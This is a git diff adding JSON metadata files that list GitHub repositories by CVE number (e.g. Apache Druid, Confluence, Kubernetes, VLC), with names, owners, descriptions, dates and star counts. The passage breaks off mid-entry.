+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 335533066,
+ "name": "CVE-2021-25646",
+ "full_name": "lp008\/CVE-2021-25646",
+ "owner": {
+ "login": "lp008",
+ "id": 11436275,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11436275?v=4",
+ "html_url": "https:\/\/github.com\/lp008"
+ },
+ "html_url": "https:\/\/github.com\/lp008\/CVE-2021-25646",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-03T06:45:54Z",
+ "updated_at": "2023-04-12T02:14:41Z",
+ "pushed_at": "2021-02-03T06:53:25Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 335952760,
+ "name": "CVE-2021-25646-GUI",
+ "full_name": "Ormicron\/CVE-2021-25646-GUI",
+ "owner": {
+ "login": "Ormicron",
+ "id": 26640179,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26640179?v=4",
+ "html_url": "https:\/\/github.com\/Ormicron"
+ },
+ "html_url": "https:\/\/github.com\/Ormicron\/CVE-2021-25646-GUI",
+ "description": "CSharp CVE-2021-25646-GUI",
+ "fork": false,
+ "created_at": "2021-02-04T12:51:01Z",
+ "updated_at": "2021-09-09T06:48:52Z",
+ "pushed_at": "2021-02-05T03:54:57Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 338562736,
+ "name": "Apache-Druid-CVE-2021-25646",
+ "full_name": "Vulnmachines\/Apache-Druid-CVE-2021-25646",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/Apache-Druid-CVE-2021-25646",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-13T11:48:35Z",
+ "updated_at": "2023-09-28T11:24:55Z",
+ "pushed_at": "2021-06-10T17:24:55Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 346861222,
+ "name": "PocList",
+ "full_name": "1n7erface\/PocList",
+ "owner": {
+ "login": "1n7erface",
+ "id": 52184829,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52184829?v=4",
+ "html_url": "https:\/\/github.com\/1n7erface"
+ },
+ "html_url": "https:\/\/github.com\/1n7erface\/PocList",
+ "description": "Alibaba-Nacos-Unauthorized\/ApacheDruid-RCE_CVE-2021-25646\/MS-Exchange-SSRF-CVE-2021-26885\/Oracle-WebLogic-CVE-2021-2109_RCE\/RG-CNVD-2021-14536\/RJ-SSL-VPN-UltraVires\/Redis-Unauthorized-RCE\/TDOA-V11.7-GetOnlineCookie\/VMware-vCenter-GetAnyFile\/yongyou-GRP-U8-XXE\/Oracle-WebLogic-CVE-2020-14883\/Oracle-WebLogic-CVE-2020-14882\/Apache-Solr-GetAnyFile\/F5-BIG-IP-CVE-2021-22986\/Sonicwall-SSL-VPN-RCE\/GitLab-Graphql-CNVD-2021-14193\/D-Link-DCS-CVE-2020-25078\/WLAN-AP-WEA453e-RCE\/360TianQing-Unauthorized\/360TianQing-SQLinjection\/FanWeiOA-V8-SQLinjection\/QiZhiBaoLeiJi-AnyUserLogin\/QiAnXin-WangKangFirewall-RCE\/金山-V8-终端安全系统\/NCCloud-SQLinjection\/ShowDoc-RCE",
+ "fork": false,
+ "created_at": "2021-03-11T22:49:17Z",
+ "updated_at": "2024-06-21T17:03:26Z",
+ "pushed_at": "2023-05-11T14:36:58Z",
+ "stargazers_count": 1079,
+ "watchers_count": 1079,
+ "has_discussions": false,
+ "forks_count": 321,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "alibaba-nacos",
+ "jar",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 321,
+ "watchers": 1079,
+ "score": 0,
+ "subscribers_count": 37
+ },
+ {
+ "id": 357955989,
+ "name": "CVE-2021-25646",
+ "full_name": "givemefivw\/CVE-2021-25646",
+ "owner": {
+ "login": "givemefivw",
+ "id": 65514141,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65514141?v=4",
+ "html_url": "https:\/\/github.com\/givemefivw"
+ },
+ "html_url": "https:\/\/github.com\/givemefivw\/CVE-2021-25646",
+ "description": "CVE-2021-25646 Apache Druid 远程代码执行漏洞 Wker脚本",
+ "fork": false,
+ "created_at": "2021-04-14T15:36:04Z",
+ "updated_at": "2022-05-17T02:20:31Z",
+ "pushed_at": "2021-04-15T09:55:23Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437570654,
+ "name": "CVE-2021-25646",
+ "full_name": "j2ekim\/CVE-2021-25646",
+ "owner": {
+ "login": "j2ekim",
+ "id": 33790074,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33790074?v=4",
+ "html_url": "https:\/\/github.com\/j2ekim"
+ },
+ "html_url": "https:\/\/github.com\/j2ekim\/CVE-2021-25646",
+ "description": "Apache Druid remote code execution vulnerability - Apache Druid 远程代码执行漏洞利用 CVE-2021-25646",
+ "fork": false,
+ "created_at": "2021-12-12T14:40:12Z",
+ "updated_at": "2022-03-23T05:51:41Z",
+ "pushed_at": "2021-12-12T14:55:26Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-25646"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25679.json b/2021/CVE-2021-25679.json
new file mode 100644
index 0000000000..e25538dc2a
--- /dev/null
+++ b/2021/CVE-2021-25679.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 344250257,
+ "name": "AdTran-Personal-Phone-Manager-Vulns",
+ "full_name": "3ndG4me\/AdTran-Personal-Phone-Manager-Vulns",
+ "owner": {
+ "login": "3ndG4me",
+ "id": 14339392,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14339392?v=4",
+ "html_url": "https:\/\/github.com\/3ndG4me"
+ },
+ "html_url": "https:\/\/github.com\/3ndG4me\/AdTran-Personal-Phone-Manager-Vulns",
+ "description": "A repository hosting write ups for the 0 days CVE-2021-25679, CVE-2021-25680, and CVE-2021-25681 ",
+ "fork": false,
+ "created_at": "2021-03-03T20:06:54Z",
+ "updated_at": "2023-09-28T11:25:28Z",
+ "pushed_at": "2021-04-17T20:03:28Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25735.json b/2021/CVE-2021-25735.json
new file mode 100644
index 0000000000..81374eb288
--- /dev/null
+++ b/2021/CVE-2021-25735.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 360429516,
+ "name": "CVE-2021-25735",
+ "full_name": "darryk10\/CVE-2021-25735",
+ "owner": {
+ "login": "darryk10",
+ "id": 77834235,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77834235?v=4",
+ "html_url": "https:\/\/github.com\/darryk10"
+ },
+ "html_url": "https:\/\/github.com\/darryk10\/CVE-2021-25735",
+ "description": "Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass",
+ "fork": false,
+ "created_at": "2021-04-22T07:25:31Z",
+ "updated_at": "2022-11-09T18:12:01Z",
+ "pushed_at": "2021-04-23T13:11:17Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25741.json b/2021/CVE-2021-25741.json
new file mode 100644
index 0000000000..ad5a853bd6
--- /dev/null
+++ b/2021/CVE-2021-25741.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 449716090,
+ "name": "CVE-2021-25741",
+ "full_name": "Betep0k\/CVE-2021-25741",
+ "owner": {
+ "login": "Betep0k",
+ "id": 25924958,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25924958?v=4",
+ "html_url": "https:\/\/github.com\/Betep0k"
+ },
+ "html_url": "https:\/\/github.com\/Betep0k\/CVE-2021-25741",
+ "description": "Exploit for CVE-2021-25741 vulnerability",
+ "fork": false,
+ "created_at": "2022-01-19T14:05:20Z",
+ "updated_at": "2023-10-27T13:08:11Z",
+ "pushed_at": "2022-01-19T19:15:36Z",
+ "stargazers_count": 29,
+ "watchers_count": 29,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 29,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 707080239,
+ "name": "CVE-2021-25741",
+ "full_name": "cdxiaodong\/CVE-2021-25741",
+ "owner": {
+ "login": "cdxiaodong",
+ "id": 84082748,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84082748?v=4",
+ "html_url": "https:\/\/github.com\/cdxiaodong"
+ },
+ "html_url": "https:\/\/github.com\/cdxiaodong\/CVE-2021-25741",
+ "description": "fork on Betep0k\/CVE-2021-25741\/fork whose images is useless and test on metarget",
+ "fork": false,
+ "created_at": "2023-10-19T07:26:11Z",
+ "updated_at": "2023-10-19T07:31:06Z",
+ "pushed_at": "2023-10-19T07:35:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25790.json b/2021/CVE-2021-25790.json
new file mode 100644
index 0000000000..d35bcac9e6
--- /dev/null
+++ b/2021/CVE-2021-25790.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 396769362,
+ "name": "CVE-2021-25790-Multiple-Stored-XSS",
+ "full_name": "MrCraniums\/CVE-2021-25790-Multiple-Stored-XSS",
+ "owner": {
+ "login": "MrCraniums",
+ "id": 10303989,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10303989?v=4",
+ "html_url": "https:\/\/github.com\/MrCraniums"
+ },
+ "html_url": "https:\/\/github.com\/MrCraniums\/CVE-2021-25790-Multiple-Stored-XSS",
+ "description": "CVE-2021-25790-Multiple-Stored-XSS : Multiple Stored XSS in House Rental and Property Listing",
+ "fork": false,
+ "created_at": "2021-08-16T11:46:02Z",
+ "updated_at": "2021-08-16T11:50:43Z",
+ "pushed_at": "2021-08-16T11:50:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25791.json b/2021/CVE-2021-25791.json
new file mode 100644
index 0000000000..6fd916b7d3
--- /dev/null
+++ b/2021/CVE-2021-25791.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 396762359,
+ "name": "CVE-2021-25791-Multiple-Stored-XSS",
+ "full_name": "MrCraniums\/CVE-2021-25791-Multiple-Stored-XSS",
+ "owner": {
+ "login": "MrCraniums",
+ "id": 10303989,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10303989?v=4",
+ "html_url": "https:\/\/github.com\/MrCraniums"
+ },
+ "html_url": "https:\/\/github.com\/MrCraniums\/CVE-2021-25791-Multiple-Stored-XSS",
+ "description": "Multiple Stored XSS Online Doctor Appointment System ",
+ "fork": false,
+ "created_at": "2021-08-16T11:25:30Z",
+ "updated_at": "2021-08-16T11:50:46Z",
+ "pushed_at": "2021-08-16T11:47:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25801.json b/2021/CVE-2021-25801.json
new file mode 100644
index 0000000000..527c0bb0ce
--- /dev/null
+++ b/2021/CVE-2021-25801.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484198736,
+ "name": "VLC_CVE-2021-25801_Analysis",
+ "full_name": "DShankle\/VLC_CVE-2021-25801_Analysis",
+ "owner": {
+ "login": "DShankle",
+ "id": 44985044,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44985044?v=4",
+ "html_url": "https:\/\/github.com\/DShankle"
+ },
+ "html_url": "https:\/\/github.com\/DShankle\/VLC_CVE-2021-25801_Analysis",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-21T20:41:18Z",
+ "updated_at": "2022-08-29T17:16:48Z",
+ "pushed_at": "2022-04-21T21:09:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25804.json b/2021/CVE-2021-25804.json
new file mode 100644
index 0000000000..3913556732
--- /dev/null
+++ b/2021/CVE-2021-25804.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 495571729,
+ "name": "VLC_CVE-2021-25804_Analysis",
+ "full_name": "DShankle\/VLC_CVE-2021-25804_Analysis",
+ "owner": {
+ "login": "DShankle",
+ "id": 44985044,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44985044?v=4",
+ "html_url": "https:\/\/github.com\/DShankle"
+ },
+ "html_url": "https:\/\/github.com\/DShankle\/VLC_CVE-2021-25804_Analysis",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-23T20:58:56Z",
+ "updated_at": "2022-08-29T17:19:40Z",
+ "pushed_at": "2022-08-29T17:48:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25837.json b/2021/CVE-2021-25837.json
new file mode 100644
index 0000000000..fa8fa51c49
--- /dev/null
+++ b/2021/CVE-2021-25837.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486821585,
+ "name": "Ethermint-CVE-2021-25837",
+ "full_name": "iczc\/Ethermint-CVE-2021-25837",
+ "owner": {
+ "login": "iczc",
+ "id": 12002459,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12002459?v=4",
+ "html_url": "https:\/\/github.com\/iczc"
+ },
+ "html_url": "https:\/\/github.com\/iczc\/Ethermint-CVE-2021-25837",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-29T03:12:27Z",
+ "updated_at": "2022-08-17T13:55:40Z",
+ "pushed_at": "2022-05-05T06:10:24Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-26084.json b/2021/CVE-2021-26084.json
new file mode 100644
index 0000000000..49142e0798
--- /dev/null
+++ b/2021/CVE-2021-26084.json
@@ -0,0 +1,1179 @@
+[
+ {
+ "id": 401772671,
+ "name": "CVE-2021-26084",
+ "full_name": "crowsec-edtech\/CVE-2021-26084",
+ "owner": {
+ "login": "crowsec-edtech",
+ "id": 97851186,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97851186?v=4",
+ "html_url": "https:\/\/github.com\/crowsec-edtech"
+ },
+ "html_url": "https:\/\/github.com\/crowsec-edtech\/CVE-2021-26084",
+ "description": "CVE-2021-26084 - Confluence Pre-Auth RCE | OGNL injection ",
+ "fork": false,
+ "created_at": "2021-08-31T16:33:32Z",
+ "updated_at": "2023-11-01T10:16:55Z",
+ "pushed_at": "2021-09-01T17:56:22Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 401870801,
+ "name": "CVE-2021-26084_PoC",
+ "full_name": "alt3kx\/CVE-2021-26084_PoC",
+ "owner": {
+ "login": "alt3kx",
+ "id": 3140111,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4",
+ "html_url": "https:\/\/github.com\/alt3kx"
+ },
+ "html_url": "https:\/\/github.com\/alt3kx\/CVE-2021-26084_PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-31T23:33:44Z",
+ "updated_at": "2023-09-28T11:31:01Z",
+ "pushed_at": "2021-09-01T01:01:06Z",
+ "stargazers_count": 55,
+ "watchers_count": 55,
+ "has_discussions": false,
+ "forks_count": 20,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 20,
+ "watchers": 55,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 401884408,
+ "name": "CVE-2021-26084",
+ "full_name": "dinhbaouit\/CVE-2021-26084",
+ "owner": {
+ "login": "dinhbaouit",
+ "id": 17717385,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17717385?v=4",
+ "html_url": "https:\/\/github.com\/dinhbaouit"
+ },
+ "html_url": "https:\/\/github.com\/dinhbaouit\/CVE-2021-26084",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-01T00:50:30Z",
+ "updated_at": "2023-09-05T06:01:20Z",
+ "pushed_at": "2021-09-01T01:17:58Z",
+ "stargazers_count": 54,
+ "watchers_count": 54,
+ "has_discussions": false,
+ "forks_count": 30,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 30,
+ "watchers": 54,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 401907723,
+ "name": "CVE-2021-26084",
+ "full_name": "JKme\/CVE-2021-26084",
+ "owner": {
+ "login": "JKme",
+ "id": 2935865,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2935865?v=4",
+ "html_url": "https:\/\/github.com\/JKme"
+ },
+ "html_url": "https:\/\/github.com\/JKme\/CVE-2021-26084",
+ "description": "CVE-2021-26084 Remote Code Execution on Confluence Servers, reference: https:\/\/github.com\/httpvoid\/writeups\/blob\/main\/Confluence-RCE.md",
+ "fork": false,
+ "created_at": "2021-09-01T02:35:04Z",
+ "updated_at": "2024-04-22T13:37:41Z",
+ "pushed_at": "2021-09-01T02:34:14Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 401967623,
+ "name": "CVE-2021-26084_Confluence",
+ "full_name": "hev0x\/CVE-2021-26084_Confluence",
+ "owner": {
+ "login": "hev0x",
+ "id": 6265911,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4",
+ "html_url": "https:\/\/github.com\/hev0x"
+ },
+ "html_url": "https:\/\/github.com\/hev0x\/CVE-2021-26084_Confluence",
+ "description": "Confluence Server Webwork OGNL injection",
+ "fork": false,
+ "created_at": "2021-09-01T07:15:17Z",
+ "updated_at": "2024-06-25T09:10:24Z",
+ "pushed_at": "2021-12-03T22:09:31Z",
+ "stargazers_count": 307,
+ "watchers_count": 307,
+ "has_discussions": false,
+ "forks_count": 82,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 82,
+ "watchers": 307,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 401984571,
+ "name": "CVE-2021-26084",
+ "full_name": "Udyz\/CVE-2021-26084",
+ "owner": {
+ "login": "Udyz",
+ "id": 39673284,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39673284?v=4",
+ "html_url": "https:\/\/github.com\/Udyz"
+ },
+ "html_url": "https:\/\/github.com\/Udyz\/CVE-2021-26084",
+ "description": "Atlassian Confluence Pre-Auth RCE",
+ "fork": false,
+ "created_at": "2021-09-01T08:18:44Z",
+ "updated_at": "2023-09-28T11:31:02Z",
+ "pushed_at": "2021-09-07T10:25:48Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 401990251,
+ "name": "CVE-2021-26084_Confluence",
+ "full_name": "prettyrecon\/CVE-2021-26084_Confluence",
+ "owner": {
+ "login": "prettyrecon",
+ "id": 79907007,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79907007?v=4",
+ "html_url": "https:\/\/github.com\/prettyrecon"
+ },
+ "html_url": "https:\/\/github.com\/prettyrecon\/CVE-2021-26084_Confluence",
+ "description": "CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection 回显",
+ "fork": false,
+ "created_at": "2021-09-01T08:39:41Z",
+ "updated_at": "2023-09-28T11:31:02Z",
+ "pushed_at": "2021-09-01T08:17:05Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 36,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 36,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 402010179,
+ "name": "CVE-2021-26084",
+ "full_name": "0xf4n9x\/CVE-2021-26084",
+ "owner": {
+ "login": "0xf4n9x",
+ "id": 40891670,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40891670?v=4",
+ "html_url": "https:\/\/github.com\/0xf4n9x"
+ },
+ "html_url": "https:\/\/github.com\/0xf4n9x\/CVE-2021-26084",
+ "description": "CVE-2021-26084 Remote Code Execution on Confluence Servers",
+ "fork": false,
+ "created_at": "2021-09-01T09:50:26Z",
+ "updated_at": "2024-06-25T08:31:41Z",
+ "pushed_at": "2022-02-10T11:38:46Z",
+ "stargazers_count": 70,
+ "watchers_count": 70,
+ "has_discussions": false,
+ "forks_count": 43,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 43,
+ "watchers": 70,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 402050204,
+ "name": "Confluence_CVE-2021-26084",
+ "full_name": "Vulnmachines\/Confluence_CVE-2021-26084",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/Confluence_CVE-2021-26084",
+ "description": "Remote Code Execution on Confluence Servers : CVE-2021-26084",
+ "fork": false,
+ "created_at": "2021-09-01T12:19:53Z",
+ "updated_at": "2024-05-10T18:28:57Z",
+ "pushed_at": "2022-07-29T08:01:19Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 402052753,
+ "name": "westone-CVE-2021-26084-scanner",
+ "full_name": "Osyanina\/westone-CVE-2021-26084-scanner",
+ "owner": {
+ "login": "Osyanina",
+ "id": 78467376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4",
+ "html_url": "https:\/\/github.com\/Osyanina"
+ },
+ "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2021-26084-scanner",
+ "description": "CVE-2021-26084 Remote Code Execution on Confluence Servers",
+ "fork": false,
+ "created_at": "2021-09-01T12:28:41Z",
+ "updated_at": "2021-09-01T12:29:57Z",
+ "pushed_at": "2021-09-01T12:33:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 402086975,
+ "name": "CVE-2021-26084",
+ "full_name": "b1gw00d\/CVE-2021-26084",
+ "owner": {
+ "login": "b1gw00d",
+ "id": 7240776,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7240776?v=4",
+ "html_url": "https:\/\/github.com\/b1gw00d"
+ },
+ "html_url": "https:\/\/github.com\/b1gw00d\/CVE-2021-26084",
+ "description": "批量检测",
+ "fork": false,
+ "created_at": "2021-09-01T14:16:29Z",
+ "updated_at": "2021-12-16T03:04:33Z",
+ "pushed_at": "2021-09-01T12:51:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 402107915,
+ "name": "CVE-2021-26084",
+ "full_name": "taythebot\/CVE-2021-26084",
+ "owner": {
+ "login": "taythebot",
+ "id": 60461479,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60461479?v=4",
+ "html_url": "https:\/\/github.com\/taythebot"
+ },
+ "html_url": "https:\/\/github.com\/taythebot\/CVE-2021-26084",
+ "description": "CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)",
+ "fork": false,
+ "created_at": "2021-09-01T15:19:19Z",
+ "updated_at": "2024-03-12T09:16:42Z",
+ "pushed_at": "2021-09-08T13:40:02Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 402126120,
+ "name": "CVE-2021-26084_GoPOC",
+ "full_name": "bcdannyboy\/CVE-2021-26084_GoPOC",
+ "owner": {
+ "login": "bcdannyboy",
+ "id": 12553297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12553297?v=4",
+ "html_url": "https:\/\/github.com\/bcdannyboy"
+ },
+ "html_url": "https:\/\/github.com\/bcdannyboy\/CVE-2021-26084_GoPOC",
